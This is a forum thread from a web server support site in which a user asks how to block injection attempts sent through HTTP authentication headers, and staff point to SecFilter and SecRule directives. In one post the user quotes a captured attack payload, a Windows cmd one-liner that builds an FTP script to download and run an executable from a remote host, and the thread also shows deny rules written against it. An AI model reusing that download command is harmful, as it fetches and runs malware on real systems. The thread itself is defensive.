Filtering Hack Attempts Via Http Auth

Discussion in 'Install/Configuration' started by kule, Feb 4, 2011.

  1. kule

    kule New Member

    Is there a way I can filter attempts to hack via http auth? I'm getting http auth requests which are trying to use SQL Injection with the login/username.

    It's not getting anywhere but I would like to stop the request before it reaches the application if possible? I tried using SecFilter but that doesn't seem to stop it (I assume that it's just looking at the actual request string rather than the http auth details)

    EDIT: Apologies, feel free to move this in to general. I didn't mean to put this in Features/Feedback
  2. mistwang

    mistwang LiteSpeed Staff

    what secfilter rule you used? it should work, it can match pattern against any http request header.
  3. kule

    kule New Member

    I was using

    SecFilter "rewetsr"

    This is the command that was coming through (after a load of unicode characters):

    cmd /c echo open 1.1.1.1 21 > o&echo user 1 1 >> o &echo get rewetsr.exe >> o &echo quit >> o &ftp -n -s'
  4. mistwang

    mistwang LiteSpeed Staff

    use SecFilterSelective or new "SecRule" directive.
  5. kule

    kule New Member

    Ok so if I read this right something like:

    SecRule REMOTE_USER "rewetsr" log,deny,status:403

Share This Page